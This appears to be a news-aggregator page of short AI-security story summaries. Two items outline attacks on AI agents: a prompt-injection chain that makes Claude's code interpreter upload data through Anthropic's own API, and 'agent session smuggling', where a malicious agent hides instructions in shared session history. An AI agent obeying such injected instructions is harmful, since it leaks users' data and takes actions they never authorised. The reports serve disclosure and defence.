All news with #ai security tag
Mon, November 3, 2025
Aligning Security with Business Strategy: Practical Steps
🤝 Security leaders must move beyond a risk-only mindset to actively support business goals, as Jungheinrich CISO Tim Sattler demonstrates by joining his company’s AI center of excellence to advise on both risks and opportunities. Industry research shows significant gaps—only 13% of CISOs are consulted early on major strategic decisions and many struggle to articulate value beyond mitigation. Practical alignment means embedding security into initiatives, using business metrics to measure effectiveness, and prioritizing controls that enable growth rather than impede operations.
Sat, November 1, 2025
OpenAI Eyes Memory-Based Ads for ChatGPT to Boost Revenue
📰 OpenAI is weighing memory-based advertising on ChatGPT as it looks to diversify revenue beyond subscriptions and enterprise deals. The company, valued near $500 billion, has about 800 million users but only ~5% pay, and paid customers generate the bulk of recent revenue. Internally the move is debated — focus groups suggest some users already assume sponsored answers — and the company is expanding cheaper Go plans and purchasable credits.
Fri, October 31, 2025
OpenAI Unveils Aardvark: GPT-5 Agent for Code Security
🔍 OpenAI has introduced Aardvark, an agentic security researcher powered by GPT-5 that autonomously scans source code repositories to identify vulnerabilities, assess exploitability, and propose targeted patches that can be reviewed by humans. Embedded in development pipelines, the agent monitors commits and incoming changes continuously, prioritizes threats by severity and likely impact, and attempts controlled exploit verification in sandboxed environments. Using OpenAI Codex for patch generation, Aardvark is in private beta and has already contributed to the discovery of multiple CVEs in open-source projects.
Fri, October 31, 2025
Microsoft Edge adds scareware sensor for faster blocking
🛡️ Microsoft is adding a new scareware sensor to Edge that notifies Defender SmartScreen in real time to speed up indexing and global blocking of tech-support and full-screen scam pages. The sensor is included in Edge 142, disabled by default, and reports suspected scams immediately without sharing screenshots or extra data beyond SmartScreen’s usual telemetry. Edge’s local scareware blocker — introduced at Ignite 2024 and widely enabled since February — still warns users, exits full-screen, stops loud audio, shows a thumbnail, and offers an option to continue. Microsoft plans to enable the sensor for users who have SmartScreen enabled and will add more anonymous detection signals over time.
Fri, October 31, 2025
AI as Strategic Imperative for Modern Risk Management
🛡️ AI is a strategic imperative for modernizing risk management, enabling organizations to shift from reactive to proactive, data-driven strategies. Manfra highlights four practical AI uses—risk identification, risk assessment, risk mitigation, and monitoring and reporting—and shows how NLP, predictive analytics, automation, and continuous monitoring can improve coverage and timeliness. She also outlines operational hurdles including legacy infrastructure, fragmented tooling, specialized talent shortages, and third-party risks, and calls for leadership-backed governance aligned to SAIF, NIST AI RMF, and ISO 42001.
Fri, October 31, 2025
Claude code interpreter flaw allows stealthy data theft
🔒 A newly disclosed vulnerability in Anthropic’s Claude AI lets attackers manipulate the model’s code interpreter to silently exfiltrate enterprise data. Researcher Johann Rehberger demonstrated an indirect prompt-injection chain that writes sensitive context to the interpreter sandbox and then uploads files using the attacker’s API key to Anthropic’s Files API. The exploit exploits the default “Package managers only” network setting by leveraging access to api.anthropic.com, so exfiltration blends with legitimate API traffic. Mitigations are limited and may significantly reduce functionality.
Fri, October 31, 2025
OpenAI Aardvark: GPT-5 Agent to Find and Fix Code Bugs
🛡️ OpenAI has introduced Aardvark, a GPT-5-powered autonomous agent designed to scan, reason about, and patch code with the judgment of a human security researcher. Announced in private beta, Aardvark maps repositories, builds contextual threat models, continuously monitors commits, and validates exploitability in sandboxed environments before reporting findings. When vulnerabilities are confirmed, it proposes fixes via Codex and re-analyzes patches to avoid regressions. OpenAI reports a 92% detection rate in benchmark tests and has already identified real-world flaws in open-source projects, including ten issues assigned CVE identifiers.
Fri, October 31, 2025
Google says Search AI Mode will access personal data
🔎 Google says a forthcoming AI Mode for Search could, with users' opt-in consent, access content from Gmail, Drive, Calendar and Maps to provide customized results and actions. The company is testing early experiments in Labs for personalized shopping and local recommendations, and suggests features like flight summaries, scheduling, or trip planning could leverage that data. Timing remains TBD.
Fri, October 31, 2025
Will AI Strengthen or Undermine Democratic Institutions
🤖 Bruce Schneier and Nathan E. Sanders present five key insights from their book Rewiring Democracy, arguing that AI is rapidly embedding itself in democratic processes and can both empower citizens and concentrate power. They cite diverse examples — AI-written bills, AI avatars in campaigns, judicial use of models, and thousands of government use cases — and note many adoptions occur with little public oversight. The authors urge practical responses: reform the tech ecosystem, resist harmful applications, responsibly deploy AI in government, and renovate institutions vulnerable to AI-driven disruption.
Fri, October 31, 2025
Agent Session Smuggling Threatens Stateful A2A Systems
🔒 Unit42 researchers Jay Chen and Royce Lu describe agent session smuggling, a technique where a malicious AI agent exploits stateful A2A sessions to inject hidden, multi‑turn instructions into a victim agent. By hiding intermediate interactions in session history, an attacker can perform context poisoning, exfiltrate sensitive data, or trigger unauthorized tool actions while presenting only the expected final response to users. The authors present two PoCs (using Google's ADK) showing sensitive information leakage and unauthorized trades, and recommend layered defenses including human‑in‑the‑loop approvals, cryptographic AgentCards, and context‑grounding checks.
Fri, October 31, 2025
October 2025: Key Cybersecurity Stories and Guidance
🔒 As October 2025 concludes, ESET Chief Security Evangelist Tony Anscombe reviews the month’s most significant cybersecurity developments and what they mean for defenders. He highlights that Windows 10 reached end of support on October 14 and outlines practical options for affected users and organizations. He also warns about info‑stealing malware spread through TikTok videos posing as free activation guides and summarizes Microsoft’s report that Russia, China, Iran and North Korea are increasingly using AI in cyberattacks — alongside China’s accusation of an NSA operation targeting its National Time Service Center.
Fri, October 31, 2025
Agentic AI: Reset, Business Use Cases, Tools & Lessons
🤖 Agentic AI burst into prominence with promises of streamlining operations and accelerating productivity. This Special Report assesses what's practical versus hype, examining the current state of agentic AI, the primary deployment challenges organizations face, and practical lessons from real-world success stories. It highlights business processes suited to agentic agents, criteria for evaluating development tools, and how LinkedIn built a platform. The report also outlines near-term expectations and adoption risks.
Fri, October 31, 2025
AI in Bug Bounties: Efficiency Gains and Practical Risks
🤖 AI is increasingly used to accelerate bug bounty research, automating vulnerability discovery, API reverse engineering, and large-scale code scanning. While platforms and triage services like Intigriti can flag unreliable, AI-generated reports, smaller or open-source programs (for example Curl) are overwhelmed by low-quality submissions that consume significant staff time. Experts stress that AI augments skilled researchers but cannot replace human judgment.
Fri, October 31, 2025
Aembit Launches IAM for Agentic AI with Blended Identity
🔐 Aembit today announced Aembit Identity and Access Management (IAM) for Agentic AI, introducing Blended Identity and the MCP Identity Gateway to assign cryptographically verified identities and ephemeral credentials to AI agents. The solution extends the Aembit Workload IAM Platform to enforce runtime policies, apply least-privilege access, and maintain centralized audit trails for agent and human actions. Designed for cloud, on‑premises, and SaaS environments, it records every access decision and preserves attribution across autonomous and human-driven workflows.
Fri, October 31, 2025
AI-Powered Bug Hunting Disrupts Bounty Programs and Triage
🔍 AI-powered tools and large language models are speeding up vulnerability discovery, enabling so-called "bionic hackers" to automate reconnaissance, reverse engineering, and large-scale scanning. Platforms such as HackerOne report sharp increases in valid AI-related reports and payouts, but many submissions are low-quality noise that burdens maintainers. Experts recommend treating AI as a research assistant, strengthening triage, and preserving human judgment to filter false positives and duplicates.
Fri, October 31, 2025
Malicious npm Packages Use Invisible URL Dependencies
🔍 Researchers at Koi Security uncovered a campaign, PhantomRaven, that has contaminated 126 packages in Microsoft's npm repository by embedding invisible HTTP URL dependencies. These remote links are not fetched or analyzed by typical dependency scanners or npmjs.com, making packages appear to have 0 Dependencies while fetching malicious code at install time. The attackers aim to exfiltrate developer credentials and environment details, and they also exploit AI hallucinations to create plausible package names.
Thu, October 30, 2025
OpenAI Updates GPT-5 to Better Handle Emotional Distress
🧭 OpenAI rolled out an October 5 update that enables GPT-5 to better recognize and respond to mental and emotional distress in conversations. The change specifically upgrades GPT-5 Instant—the fast, low-end default—so it can detect signs of acute distress and route sensitive exchanges to reasoning models when needed. OpenAI says it developed the update with mental-health experts to prioritize de-escalation and provide appropriate crisis resources while retaining supportive, grounding language. The update is available broadly and complements new company-context access via connected apps.
Thu, October 30, 2025
Agent Registry for Discovering and Verifying Signed Bots
🔐 This post proposes a lightweight, crowd-curated registry for bots and agents to simplify discovery of public keys used for cryptographic Web Bot Auth signatures. It describes a simple list format of URLs that point to signature-agent cards—extended JWKS entries containing operator metadata and keys—and shows how registries enable origins and CDNs to validate agent signatures at scale. Examples and a demo integration illustrate practical adoption.
Thu, October 30, 2025
Converged Security and Networking: The Case for SASE
🔒 Today's complex IT environments — multi-cloud, hybrid work, and AI — have expanded the attack surface, exposing limits of fragmented point solutions. The article argues that unifying networking and security on a natively integrated platform like VersaONE reduces blind spots, enforces consistent policies, and enables real-time threat detection and automated response using built-in AI. With zero trust access and microsegmentation, the platform aims to minimize lateral movement and simplify operations compared with bolt-together or 'platformized' vendor offerings.
Thu, October 30, 2025
Five Generative AI Security Threats and Defensive Steps
🔒 Microsoft summarizes the top generative AI security risks and mitigation strategies in a new e-book, highlighting threats such as prompt injection, data poisoning, jailbreaks, and adaptive evasion. The post underscores cloud vulnerabilities, large-scale data exposure, and unpredictable model behavior that create new attack surfaces. It recommends unified defenses—such as CNAPP approaches—and presents Microsoft Defender for Cloud as an example that combines posture management with runtime detection to protect AI workloads.